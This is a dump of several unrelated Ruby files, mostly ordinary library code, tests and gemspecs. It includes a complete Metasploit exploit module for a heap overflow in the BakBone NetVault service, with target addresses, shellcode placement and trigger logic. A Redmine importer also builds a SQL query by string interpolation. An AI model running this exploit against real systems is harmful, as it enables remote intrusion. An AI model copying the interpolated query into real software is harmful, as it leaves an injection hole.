          # Guard against orphaned wikis whose project row is missing.
          project_identifier = "#{project['identifier']}/" if project
        end
        title = project_identifier + row_page['title']
        titles << title
        row_contents.each do |row_content|
          revisions << Page.new(build_properties(title, row_content))
        end
      end

      # Expose every Redmine project as a namespace in the target wiki.
      def add_projects_as_namespaces
        projects.each do |row_project|
          namespaces << OpenStruct.new(identifier: row_project['identifier'],
                                       name: row_project['name'])
        end
      end

      def authors_query
        'SELECT id, login, mail FROM users;'
      end

      def single_page_query(page_id)
        "SELECT * FROM wiki_content_versions WHERE page_id='#{page_id}' ORDER BY updated_on;"
      end

      def projects_query
        'SELECT id, identifier, name FROM projects;'
      end

      def pages_query
        'SELECT id, title, wiki_id FROM wiki_pages;'
      end

      def wikis_query
        'SELECT id, project_id FROM wikis;'
      end

      def pages
        @pages ||= database.query(pages_query)
      end

      def projects
        @projects ||= database.query(projects_query)
      end

      def wikis
        @wikis ||= database.query(wikis_query)
      end

      # Build the attribute hash for a single Page revision.
      #
      # Bug fix: the author may be unknown (deleted user, anonymous edit, or
      # read_authors not yet invoked), in which case +authors.fetch+ returns
      # nil — use safe navigation instead of crashing on +author.name+.
      def build_properties(title, row_content)
        author = authors.fetch(row_content["author_id"], nil)
        {
          id: row_content['id'],
          title: title,
          body: row_content['data'],
          markup: :textile,
          latest: false,
          time: row_content['updated_on'],
          message: row_content['comments'],
          author: author,
          author_name: author&.name
        }
      end
    end
  end
end
| 26.867769 | 93 | 0.579514 |
1d1224c456e02a7129ee033e931baf4f1cc0b069 | 2,654 | require 'fixtures/controllers'
require 'rspec/rails'
# Integration-style specs for the rails_param gem's `param!` declarations on
# FakeController (defined in fixtures/controllers). Uses the pre-Rails-5
# positional params syntax for controller specs.
describe FakeController, type: :controller do
  describe "type coercion" do
    it "coerces to integer" do
      get :index, page: "666"
      expect(controller.params[:page]).to eql(666)
    end
  end
  describe "nested_hash" do
    it "validates nested properties" do
      # Fixture data only; values are coerced per the controller's param!
      # declarations ("Garbriel" typo is harmless fixture text).
      params = {
        'book' => {
          'title' => 'One Hundred Years of Solitude',
          'author' => {
            'first_name' => 'Garbriel Garcia',
            'last_name' => 'Marquez',
            'age' => '70'
          },
          'price' => '$1,000.00'
        }}
      get :edit, params
      expect(controller.params[:book][:author][:age]).to eql 70
      expect(controller.params[:book][:author][:age]).to be_kind_of Integer
      # Currency strings are coerced to BigDecimal.
      expect(controller.params[:book][:price]).to eql 1000.0
      expect(controller.params[:book][:price]).to be_instance_of BigDecimal
    end
    it "raises error when required nested attribute missing" do
      params = {
        'book' => {
          'title' => 'One Hundred Years of Solitude',
          'author' => {
            'last_name' => 'Marquez',
            'age' => '70'
          },
          'price' => '$1,000.00'
        }}
      # first_name is declared required; omitting it must raise with the
      # offending param name and its validation options.
      expect { get :edit, params }.to raise_error { |error|
        expect(error).to be_a(RailsParam::Param::InvalidParameterError)
        expect(error.param).to eql("first_name")
        expect(error.options).to eql({:required => true})
      }
    end
    it "passes when hash that's not required but has required attributes is missing" do
      params = {
        'book' => {
          'title' => 'One Hundred Years of Solitude',
          'price' => '$1,000.00'
        }}
      get :edit, params
      expect(controller.params[:book][:price]).to eql 1000.0
      expect(controller.params[:book][:price]).to be_instance_of BigDecimal
    end
  end
  describe "InvalidParameterError" do
    it "raises an exception with params attributes" do
      expect { get :index, sort: "foo" }.to raise_error { |error|
        expect(error).to be_a(RailsParam::Param::InvalidParameterError)
        expect(error.param).to eql("sort")
        expect(error.options).to eql({:in => ["asc", "desc"], :default => "asc", :transform => :downcase})
      }
    end
  end
  describe ":transform parameter" do
    it "applies transformations" do
      get :index, sort: "ASC"
      expect(controller.params[:sort]).to eql("asc")
    end
  end
  describe "default values" do
    it "applies default values" do
      get :index
      expect(controller.params[:page]).to eql(1)
      expect(controller.params[:sort]).to eql("asc")
    end
  end
end
| 30.159091 | 106 | 0.585531 |
acf439d876b943e04a280a4f917d297746cae1af | 1,396 | require 'RMagick'
require 'ruby3d/core/settings'
module Ruby3d::Assets
  # An OpenGL 2D texture loaded from an image file found on the configured
  # asset search paths (decoded via RMagick, uploaded with legacy GL calls).
  class Texture
    # Resolved on-disk path of the image file.
    attr_accessor :file_name
    # Identifier the texture was requested under (the unresolved file name).
    attr_accessor :id
    attr_accessor :width
    attr_accessor :height
    # OpenGL texture object name returned by glGenTextures.
    attr_accessor :texture_id
    # Locates +file_name+ on the asset paths, decodes it with RMagick and
    # uploads it as a mipmapped, repeating GL_TEXTURE_2D.
    #
    # Raises AssetError when the file is not found on any asset path.
    # Assumes a current OpenGL context exists on the calling thread.
    def initialize(file_name)
      @assets_config = Ruby3d::Core::Settings::Settings.instance.asset_settings
      paths = @assets_config.paths
      # Try each search path in order; stop at the first existing file.
      paths.each do |p|
        @file_name = p + '/' + file_name
        break if File::exist?(@file_name)
      end
      raise AssetError.new("The texture #{@file_name} couldn't be found") unless File::exist?(@file_name)
      @id = file_name
      # First frame only; extra frames (e.g. animated GIFs) are ignored.
      img = Magick::Image::read(@file_name)[0]
      @width = img.columns
      @height = img.rows
      data = img.export_pixels_to_str(0, 0, img.columns, img.rows, 'RGB', Magick::FloatPixel)
      @texture_id = glGenTextures(1).first
      glBindTexture(GL_TEXTURE_2D, @texture_id)
      # NOTE(review): base level uses internal format 3 (RGB) while the
      # mipmap chain below is built with GL_RGBA — confirm the mismatch is
      # intentional and accepted by the target drivers.
      glTexImage2D(GL_TEXTURE_2D, 0, 3, @width, @height, 0, GL_RGB, GL_FLOAT, data)
      glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)
      glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR_MIPMAP_LINEAR)
      glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_REPEAT)
      glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_REPEAT)
      gluBuild2DMipmaps(GL_TEXTURE_2D, GL_RGBA, @width, @height, GL_RGB, GL_FLOAT, data)
      # Pixel data has been handed to the GL; free the RMagick image now.
      img.destroy!
    end
  end
end
bb6ec285d528eacc706c850035e4cf125fad76cf | 2,470 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with this
# work for additional information regarding copyright ownership. The ASF
# licenses this file to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
module Buildr
  # Adds JAXB schema-to-Java (XJC) generation support to Buildr projects via
  # the #compile_jaxb project extension.
  module JaxbXjc
    class << self
      # Version of the JAXB toolchain to download and run.
      def jaxb_version
        '2.2.1'
      end
      # The specs for requirements
      def dependencies
        [
          "javax.xml.bind:jaxb-api:jar:#{jaxb_version}",
          "com.sun.xml.bind:jaxb-impl:jar:#{jaxb_version}",
          "com.sun.xml.bind:jaxb-xjc:jar:#{jaxb_version}"
        ]
      end
      # Repositories containing the requirements
      # NOTE(review): download.java.net's maven2 repository has been retired;
      # confirm this URL still resolves or switch to Maven Central.
      def remote_repository
        'http://download.java.net/maven/2'
      end
      # Run the XJC compiler with the given command-line arguments, using the
      # resolved JAXB artifacts as the classpath.
      def xjc(*args)
        cp = Buildr.artifacts(self.dependencies).each(&:invoke).map(&:to_s)
        Java::Commands.java 'com.sun.tools.xjc.XJCFacade', *(args + [{ :classpath => cp }])
      end
    end
    # Define file tasks that run XJC over +files+ (schema files) and return
    # the directory the Java sources are generated into.
    #
    # Options:
    #   :directory    - target directory for generated sources
    #   :keep_content - do not wipe the target directory before generating
    #   :package      - Java package passed to xjc via -p
    #   :id           - cache-file discriminator when called more than once
    def compile_jaxb(files, *args)
      options = Hash === args.last ? args.pop.dup : {}
      rake_check_options options, :directory, :keep_content, :package, :id
      args = args.dup
      files = Array === files ? files.flatten : [files]
      target_dir = File.expand_path(options[:directory] || _(:target, :generated, :jaxb, 'main/java'))
      # Timestamp file makes generation incremental: the task only reruns
      # when one of the schema files is newer than this marker.
      timestamp_file = File.expand_path("#{target_dir}/jaxb-#{options[:id] || 1}.cache")
      project.iml.main_generated_source_directories << target_dir if project.iml?
      file(target_dir => timestamp_file)
      file(timestamp_file => files.flatten) do |task|
        rm_rf target_dir unless options[:keep_content]
        mkdir_p target_dir
        # args is captured by this closure; xjc flags are appended lazily
        # when the task actually executes.
        args << '-d' << target_dir
        args << '-p' << options[:package] if options[:package]
        args += files.collect{|f| f.to_s}
        JaxbXjc.xjc args
        touch timestamp_file
      end
      target_dir
    end
  end
end
# Mix the JAXB helpers into every Buildr project instance; send(:include)
# works on all Ruby versions (Module#include was private before 2.1).
Buildr::Project.send(:include, Buildr::JaxbXjc)
| 32.933333 | 102 | 0.665992 |
2680f3e764b094571478c6d8e16a9ed293d1603b | 1,749 | require File.expand_path('../lib/avatax/version', __FILE__)
Gem::Specification.new do |s|
  # Development-only dependencies (not installed with the gem).
  s.add_development_dependency('rake', '~> 12.0.0')
  s.add_development_dependency('rspec', '~> 3.5.0')
  s.add_development_dependency('webmock', '>= 2.0.0')
  s.add_development_dependency('pry')
  # Runtime dependencies: Faraday HTTP stack plus JSON handling.
  s.add_runtime_dependency('faraday', '>= 0.10')
  s.add_runtime_dependency('faraday_middleware', '>= 0.10')
  s.add_runtime_dependency('multi_json', '>= 1.0.3')
  s.add_runtime_dependency('faraday_middleware-parse_oj', '~> 0.3.2')
  s.authors = ["Marcus Vorwaller"]
  s.description = %q{A Ruby wrapper for the AvaTax REST and Search APIs}
  # Shown to the user after `gem install avatax`.
  s.post_install_message =<<eos
********************************************************************************
AvaTax REST API
------------------------------
Our developer site documents the AvaTax REST API.
(http://developer.avatax.com).
Blog
----------------------------
The Developer Blog is a great place to learn more about the API and AvaTax integrations
Subscribe to the RSS feed be notified of new posts:
(http://developer.avatax.com/blog).
********************************************************************************
eos
  s.email = ['[email protected]']
  # Gem contents are taken from git, so the packaged files depend on the
  # state of the working tree at build time.
  s.executables = `git ls-files -- bin/*`.split("\n").map{ |f| File.basename(f) }
  s.files = `git ls-files`.split("\n")
  s.homepage = 'https://github.com/avadev/AvaTax-REST-V2-Ruby-SDK'
  s.name = 'avatax'
  s.platform = Gem::Platform::RUBY
  s.require_paths = ['lib']
  s.required_rubygems_version = Gem::Requirement.new('>= 2.0.0') if s.respond_to? :required_rubygems_version=
  s.summary = %q{Ruby wrapper for the AvaTax API}
  s.test_files = `git ls-files -- {test,spec,features}/*`.split("\n")
  # VERSION comes from lib/avatax/version (required at the top of the file).
  s.version = AvaTax::VERSION.dup
end
| 42.658537 | 109 | 0.619211 |
1a8c987ce0f162959d6a84a5325542a2b17b4747 | 714 | require 'test_helper'
# Unit tests for the Micropost model: presence/length validations and the
# default ordering scope.
class MicropostTest < ActiveSupport::TestCase
  def setup
    @user = users(:michael)
    @micropost = @user.microposts.build(content: "Lorem ipsum")
  end

  test "should be valid" do
    assert_predicate @micropost, :valid?
  end

  test "user id should be present" do
    @micropost.user_id = nil
    refute_predicate @micropost, :valid?
  end

  test "content should be present" do
    @micropost.content = "   "
    refute_predicate @micropost, :valid?
  end

  test "content should be at most 140 characters" do
    @micropost.content = "a" * 141
    refute_predicate @micropost, :valid?
  end

  test "order should be most recent first" do
    assert_equal microposts(:most_recent), Micropost.first
  end
end
3322a421dbfd67ea32cd1b36825d715438df6368 | 107 | Rails.application.routes.draw do
mount StimulusReflexProfiler::Engine => "/stimulus_reflex_profiler"
end
| 26.75 | 69 | 0.82243 |
f8d0bdda9b091453a17387883c397e78f4aea654 | 8,735 | # -----------------------------------------------------------------------------
#
# Common tests for geometry collection implementations
#
# -----------------------------------------------------------------------------
require 'rgeo'
module RGeo
module Tests # :nodoc:
module Common # :nodoc:
module GeometryCollectionTests # :nodoc:
def setup
@factory = create_factory
@point1 = @factory.point(0, 0)
@point2 = @factory.point(1, 0)
@point3 = @factory.point(-4, 2)
@point4 = @factory.point(-5, 3)
@line1 = @factory.line_string([@point3, @point4])
@line2 = @factory.line_string([@point3, @point4, @point1])
@line3 = @factory.line(@point3, @point4)
end
def test_creation_simple
geom_ = @factory.collection([@point1, @line1])
assert_not_nil(geom_)
assert(::RGeo::Feature::GeometryCollection === geom_)
assert_equal(::RGeo::Feature::GeometryCollection, geom_.geometry_type)
assert_equal(2, geom_.num_geometries)
assert(@point1.eql?(geom_[0]))
assert(@line1.eql?(geom_[1]))
end
def test_creation_empty
geom_ = @factory.collection([])
assert_not_nil(geom_)
assert(::RGeo::Feature::GeometryCollection === geom_)
assert_equal(::RGeo::Feature::GeometryCollection, geom_.geometry_type)
assert_equal(0, geom_.num_geometries)
assert_equal([], geom_.to_a)
end
def test_bounds_check
geom_ = @factory.collection([@point1, @line1])
assert_nil(geom_.geometry_n(200))
assert_nil(geom_.geometry_n(-1))
assert(@line1.eql?(geom_[-1]))
end
def test_creation_save_klass
geom_ = @factory.collection([@point1, @line3])
assert_not_nil(geom_)
assert(::RGeo::Feature::GeometryCollection === geom_)
assert_equal(::RGeo::Feature::GeometryCollection, geom_.geometry_type)
assert_equal(2, geom_.num_geometries)
assert(geom_[1].eql?(@line3))
end
def test_creation_compound
geom1_ = @factory.collection([@point1, @line1])
geom2_ = @factory.collection([@point2, geom1_])
assert_not_nil(geom2_)
assert(::RGeo::Feature::GeometryCollection === geom2_)
assert_equal(::RGeo::Feature::GeometryCollection, geom2_.geometry_type)
assert_equal(2, geom2_.num_geometries)
assert(geom2_[1].eql?(geom1_))
end
def test_creation_compound_save_klass
geom1_ = @factory.collection([@point1, @line3])
geom2_ = @factory.collection([@point2, geom1_])
::GC.start
assert_not_nil(geom2_)
assert(::RGeo::Feature::GeometryCollection === geom2_)
assert_equal(::RGeo::Feature::GeometryCollection, geom2_.geometry_type)
assert_equal(2, geom2_.num_geometries)
assert_equal(::RGeo::Feature::Line, geom2_[1][1].geometry_type)
end
def test_required_equivalences
geom1_ = @factory.collection([@point1, @line1])
geom2_ = @factory.collection([@point1, @line1])
assert(geom1_.eql?(geom2_))
assert(geom1_ == geom2_)
end
def test_fully_equal
geom1_ = @factory.collection([@point1, @line1])
geom2_ = @factory.collection([@point1, @line1])
assert(geom1_.rep_equals?(geom2_))
assert(geom1_.equals?(geom2_))
end
def test_geometrically_equal
geom1_ = @factory.collection([@point2, @line2])
geom2_ = @factory.collection([@point2, @line1, @line2])
assert(!geom1_.rep_equals?(geom2_))
assert(geom1_.equals?(geom2_))
end
def test_empty_equal
geom1_ = @factory.collection([])
geom2_ = @factory.collection([])
assert(geom1_.rep_equals?(geom2_))
assert(geom1_.equals?(geom2_))
end
def test_not_equal
geom1_ = @factory.collection([@point1, @line1])
geom2_ = @factory.collection([@point2, @line1])
assert(!geom1_.rep_equals?(geom2_))
assert(!geom1_.equals?(geom2_))
end
def test_hashes_equal_for_representationally_equivalent_objects
geom1_ = @factory.collection([@point1, @line1])
geom2_ = @factory.collection([@point1, @line1])
assert_equal(geom1_.hash, geom2_.hash)
end
def test_nested_equality
geom1_ = @factory.collection([@line1, @factory.collection([@point1, @point2])])
geom2_ = @factory.collection([@line1, @factory.collection([@point1, @point2])])
assert(geom1_.rep_equals?(geom2_))
assert_equal(geom1_.hash, geom2_.hash)
end
def test_out_of_order_is_not_equal
geom1_ = @factory.collection([@line1, @point2])
geom2_ = @factory.collection([@point2, @line1])
assert(!geom1_.rep_equals?(geom2_))
assert_not_equal(geom1_.hash, geom2_.hash)
end
def test_wkt_creation_simple
parsed_geom_ = @factory.parse_wkt('GEOMETRYCOLLECTION(POINT(0 0), LINESTRING(-4 2, -5 3))')
built_geom_ = @factory.collection([@point1, @line1])
assert(built_geom_.eql?(parsed_geom_))
end
def test_wkt_creation_empty
parsed_geom_ = @factory.parse_wkt('GEOMETRYCOLLECTION EMPTY')
assert_equal(0, parsed_geom_.num_geometries)
assert_equal([], parsed_geom_.to_a)
end
def test_clone
geom1_ = @factory.collection([@point1, @line1])
geom2_ = geom1_.clone
assert(geom1_.eql?(geom2_))
assert_equal(::RGeo::Feature::GeometryCollection, geom2_.geometry_type)
assert_equal(2, geom2_.num_geometries)
assert(@point1.eql?(geom2_[0]))
assert(@line1.eql?(geom2_[1]))
end
def test_type_check
geom1_ = @factory.collection([@point1, @line1])
assert(::RGeo::Feature::Geometry.check_type(geom1_))
assert(!::RGeo::Feature::Point.check_type(geom1_))
assert(::RGeo::Feature::GeometryCollection.check_type(geom1_))
assert(!::RGeo::Feature::MultiPoint.check_type(geom1_))
geom2_ = @factory.collection([@point1, @point2])
assert(::RGeo::Feature::Geometry.check_type(geom2_))
assert(!::RGeo::Feature::Point.check_type(geom2_))
assert(::RGeo::Feature::GeometryCollection.check_type(geom2_))
assert(!::RGeo::Feature::MultiPoint.check_type(geom2_))
end
def test_as_text_wkt_round_trip
geom1_ = @factory.collection([@point1, @line1])
text_ = geom1_.as_text
geom2_ = @factory.parse_wkt(text_)
assert(geom1_.eql?(geom2_))
end
def test_as_binary_wkb_round_trip
geom1_ = @factory.collection([@point1, @line1])
binary_ = geom1_.as_binary
geom2_ = @factory.parse_wkb(binary_)
assert(geom1_.eql?(geom2_))
end
def test_dimension
geom1_ = @factory.collection([@point1, @line1])
assert_equal(1, geom1_.dimension)
geom2_ = @factory.collection([@point1, @point2])
assert_equal(0, geom2_.dimension)
geom3_ = @factory.collection([])
assert_equal(-1, geom3_.dimension)
end
def test_is_empty
geom1_ = @factory.collection([@point1, @line1])
assert(!geom1_.is_empty?)
geom2_ = @factory.collection([])
assert(geom2_.is_empty?)
end
def test_empty_collection_envelope
empty_ = @factory.collection([])
envelope_ = empty_.envelope
assert_equal(Feature::GeometryCollection, envelope_.geometry_type)
assert_equal(0, envelope_.num_geometries)
end
def test_empty_collection_boundary
empty_ = @factory.collection([])
assert_nil(empty_.boundary)
end
def test_each_block
geom1_ = @factory.collection([@point1, @line1])
i_ = 0
geom1_.each do |g_|
if i_ == 0
assert_equal(@point1, g_)
else
assert_equal(@line1, g_)
end
i_ += 1
end
end
# #each without a block must return an enumerator that yields the members
# in order and then raises StopIteration when exhausted.
def test_each_enumerator
  enum_ = @factory.collection([@point1, @line1]).each
  assert_equal(@point1, enum_.next)
  assert_equal(@line1, enum_.next)
  assert_raise(::StopIteration) { enum_.next }
end
end
end
end
end
| 32.232472 | 101 | 0.587293 |
79110358ac6401c98bca082ee70d72d46b7a0076 | 2,094 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# In the development environment your application's code is reloaded on
# every request. This slows down response time but is perfect for development
# since you don't have to restart the web server when you make code changes.
config.cache_classes = false
# Do not eager load code on boot.
config.eager_load = false
# Show full error reports.
config.consider_all_requests_local = true
# Enable/disable caching. By default caching is disabled.
if Rails.root.join('tmp/caching-dev.txt').exist?
config.action_controller.perform_caching = true
config.cache_store = :memory_store
config.public_file_server.headers = {
'Cache-Control' => 'public, max-age=172800'
}
else
config.action_controller.perform_caching = false
config.cache_store = :null_store
end
config.action_mailer.raise_delivery_errors = true
config.action_mailer.delivery_method = :test
host = 'localhost:3000' # Don't use this literally; use your local dev host instead
config.action_mailer.default_url_options = { host: host, protocol: 'https' }
# Don't care if the mailer can't send.
config.action_mailer.perform_caching = false
# Print deprecation notices to the Rails logger.
config.active_support.deprecation = :log
# Raise an error on page load if there are pending migrations.
config.active_record.migration_error = :page_load
# Debug mode disables concatenation and preprocessing of assets.
# This option may cause significant delays in view rendering with a large
# number of complex assets.
config.assets.debug = true
# Suppress logger output for asset requests.
config.assets.quiet = true
# Raises error for missing translations
# config.action_view.raise_on_missing_translations = true
# Use an evented file watcher to asynchronously detect changes in source code,
# routes, locales, etc. This feature depends on the listen gem.
config.file_watcher = ActiveSupport::EventedFileUpdateChecker
end
| 35.491525 | 85 | 0.7617 |
acdd68ab009eafba42582e261f6eac98f16f82c1 | 2,548 | # -*- encoding: utf-8 -*-
# stub: dnsruby 1.61.3 ruby lib
Gem::Specification.new do |s|
s.name = "dnsruby".freeze
s.version = "1.61.3"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["Alex Dalitz".freeze]
s.date = "2019-08-15"
s.description = "Dnsruby is a pure Ruby DNS client library which implements a\nstub resolver. It aims to comply with all DNS RFCs, including\nDNSSEC NSEC3 support.".freeze
s.email = "[email protected]".freeze
s.extra_rdoc_files = ["DNSSEC".freeze, "EXAMPLES".freeze, "README.md".freeze, "EVENTMACHINE".freeze]
s.files = ["DNSSEC".freeze, "EVENTMACHINE".freeze, "EXAMPLES".freeze, "README.md".freeze]
s.homepage = "https://github.com/alexdalitz/dnsruby".freeze
s.licenses = ["Apache License, Version 2.0".freeze]
s.post_install_message = "Installing dnsruby...\n For issues and source code: https://github.com/alexdalitz/dnsruby\n For general discussion (please tell us how you use dnsruby): https://groups.google.com/forum/#!forum/dnsruby".freeze
s.rubygems_version = "3.1.3".freeze
s.summary = "Ruby DNS(SEC) implementation".freeze
s.installed_by_version = "3.1.3" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
end
if s.respond_to? :add_runtime_dependency then
s.add_development_dependency(%q<pry>.freeze, ["~> 0.10"])
s.add_development_dependency(%q<pry-byebug>.freeze, ["~> 2.0"])
s.add_development_dependency(%q<rake>.freeze, ["~> 10", ">= 10.3.2"])
s.add_development_dependency(%q<minitest>.freeze, ["~> 5.4"])
s.add_development_dependency(%q<rubydns>.freeze, ["~> 2.0.1"])
s.add_development_dependency(%q<nio4r>.freeze, ["~> 2.0"])
s.add_development_dependency(%q<minitest-display>.freeze, [">= 0.3.0"])
s.add_development_dependency(%q<coveralls>.freeze, ["~> 0.7"])
s.add_runtime_dependency(%q<addressable>.freeze, ["~> 2.5"])
else
s.add_dependency(%q<pry>.freeze, ["~> 0.10"])
s.add_dependency(%q<pry-byebug>.freeze, ["~> 2.0"])
s.add_dependency(%q<rake>.freeze, ["~> 10", ">= 10.3.2"])
s.add_dependency(%q<minitest>.freeze, ["~> 5.4"])
s.add_dependency(%q<rubydns>.freeze, ["~> 2.0.1"])
s.add_dependency(%q<nio4r>.freeze, ["~> 2.0"])
s.add_dependency(%q<minitest-display>.freeze, [">= 0.3.0"])
s.add_dependency(%q<coveralls>.freeze, ["~> 0.7"])
s.add_dependency(%q<addressable>.freeze, ["~> 2.5"])
end
end
| 50.96 | 238 | 0.681319 |
bbdef324e989f0a92df7834ba974c34d893550c5 | 4,718 | ##
# $Id: bakbone_netvault_heap.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'BakBone NetVault Remote Heap Overflow',
'Description' => %q{
This module exploits a heap overflow in the BakBone NetVault
Process Manager service. This code is a direct port of the netvault.c
code written by nolimit and BuzzDee.
},
'Author' => [ 'hdm', '<nolimit.bugtraq[at]ri0tnet.net>' ],
'Version' => '$Revision: 10394 $',
'References' =>
[
['CVE', '2005-1009'],
['OSVDB', '15234'],
['BID', '12967'],
],
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x20",
'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
},
'Platform' => 'win',
'Targets' =>
[
['Windows 2000 SP4 English', { 'Ret' => 0x75036d7e, 'UEF' => 0x7c54144c } ],
['Windows XP SP0/SP1 English', { 'Ret' => 0x7c369bbd, 'UEF' => 0x77ed73b4 } ],
],
'Privileged' => false,
'DisclosureDate' => 'Apr 01 2005'
))
register_options(
[
Opt::RPORT(20031)
], self.class)
end
# Fingerprints the service: sends a fixed NetVault request containing a
# length-prefixed hostname and looks for an "NVBuild" marker in the reply.
# Returns Detected (with the build number) or Safe.
def check
  connect
  hname = "METASPLOIT"
  # Binary probe presumably copied from netvault.c; field meanings are
  # undocumented here — TODO confirm against the original exploit source.
  probe =
    "\xc9\x00\x00\x00\x01\xcb\x22\x77\xc9\x17\x00\x00\x00\x69\x3b\x69" +
    "\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69" +
    "\x3b\x73\x3b\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00" +
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00" +
    "\x03\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00" +
    [ hname.length + 1 ].pack('V') + hname + "\x00"
  # Pad the request to a fixed 201-byte frame.
  probe += "\x00" * (201 - probe.length)
  sock.put(probe)
  res = sock.get_once(1, 10)
  off = (res || '').index("NVBuild")
  if off
    # Build number follows the marker as a 32-bit-length-prefixed string.
    off += 21
    ver = res[off + 4, res[off, 4].unpack('V')[0]].to_i
    if ver > 0
      print_status("Detected NetVault Build #{ver}")
      return Exploit::CheckCode::Detected
    end
  end
  return Exploit::CheckCode::Safe
end
# Sends a ~39KB overflow request that plants a fake header, a short jump,
# the return/UEF addresses, and the payload; then reconnects repeatedly to
# trigger the corrupted memory and fires the payload handler.
def exploit
  print_status("Trying target #{target.name}...")

  # Protocol header presumably ported verbatim from netvault.c; internal
  # field meanings are undocumented here — TODO confirm.
  head =
    "\x00\x00\x02\x01\x00\x00\x00\x8f\xd0\xf0\xca\x0b\x00\x00\x00\x69" +
    "\x3b\x62\x3b\x6f\x3b\x6f\x3b\x7a\x3b\x00\x11\x57\x3c\x42\x00\x01" +
    "\xb9\xf9\xa2\xc8\x00\x00\x00\x00\x03\x00\x00\x00\x00\x01\xa5\x97" +
    "\xf0\xca\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20\x00\x00\x00\x10" +
    "\x02\x4e\x3f\xac\x14\xcc\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01" +
    "\xa5\x97\xf0\xca\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20\x00\x00" +
    "\x00\x10\x02\x4e\x3f\xc0\xa8\xea\xeb\x00\x00\x00\x00\x00\x00\x00" +
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
    "\x00\x01\xa5\x97\xf0\xca\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20" +
    "\x00\x00\x00\x10\x02\x4e\x3f\xc2\x97\x2c\xd3\x00\x00\x00\x00\x00" +
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
    "\x00\x00\x00\xb9\xf9\xa2\xc8\x02\x02\x00\x00\x00\xa5\x97\xf0\xca" +
    "\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20\x00\x00\x00\x04\x02\x4e" +
    "\x3f\xac\x14\xcc\x0a\xb0\xfc\xe2\x00\x00\x00\x00\x00\xec\xfa\x8e" +
    "\x01\xa4\x6b\x41\x00\xe4\xfa\x8e\x01\xff\xff\xff\xff\x01\x02"

  # NOP sled sized to the vulnerable buffer, NUL-terminated.
  pattern = make_nops(39947) + "\x00\x00\x00"
  p = payload.encoded

  pattern[0, head.length] = head
  # \xeb\x0a: x86 short jump over the two 4-byte addresses that follow,
  # landing at the payload.
  pattern[32790, 2] = "\xeb\x0a"
  pattern[32792, 4] = [ target.ret ].pack('V')
  pattern[32796, 4] = [ target['UEF'] ].pack('V')
  pattern[32800, p.length] = p

  # Retry until the full request is written (short writes are common on
  # this service), giving up after 15 attempts.
  sent = 0
  try = 0
  15.times {
    try += 1
    connect
    sent = sock.put(pattern)
    disconnect
    break if sent == pattern.length
  }

  # Fixed: the original tested `try == 15`, which misreported failure when
  # the 15th attempt actually succeeded. Test the send result instead.
  if (sent != pattern.length)
    print_error("Could not write full packet to server.")
    return
  end

  # Fixed typo in status message ("fo four" -> "for four").
  print_status("Overflow request sent, sleeping for four seconds (#{try} tries)")
  select(nil,nil,nil,4)

  print_status("Attempting to trigger memory overwrite by reconnecting...")
  begin
    # Best effort: connection errors here are expected once the service
    # crashes into the payload, so swallow them deliberately.
    10.times { |x|
      connect
      sock.put(pattern)
      print_status(" Completed connection #{x}")
      sock.get_once(1, 1)
      disconnect
    }
  rescue
  end

  print_status("Waiting for payload to execute...")
  handler
  disconnect
end
# Wait-for-session delay (seconds) the framework observes after the
# exploit completes before giving up on an incoming session.
def wfs_delay
  5
end
end | 28.768293 | 84 | 0.60195 |
abed0c36ea77ddd6e0cc0bf7dcc91975b4bfef5f | 187 | module Graviga
module Types
# GraphQL-style scalar ID type: values are coerced to String in both
# directions (serializing to the wire and parsing from input).
class IDType < ScalarType
  # serialize and parse share a single implementation, so define both
  # dynamically from one template.
  %i[serialize parse].each do |direction|
    define_method(direction) { |value| value.to_s }
  end
end
end
end
| 13.357143 | 29 | 0.57754 |
f79b5740be097d69dac4da54b68627c34e2cd47f | 1,289 | class AddOriginalLanguageIdToEtymologies < ActiveRecord::Migration
# Adds etymologies.original_language_id and back-fills it by resolving
# each distinct textual source_language to a Language record, then drops
# the old string column. Uses legacy Rails 2.x finder/update_all APIs.
def self.up
  add_column :etymologies, :original_language_id, :integer
  say_with_time "Associating Languages with Etymologies..." do
    etyma = Etymology.find(:all, :select => :source_language)
    etyma.collect(&:source_language).uniq.each do |langname|
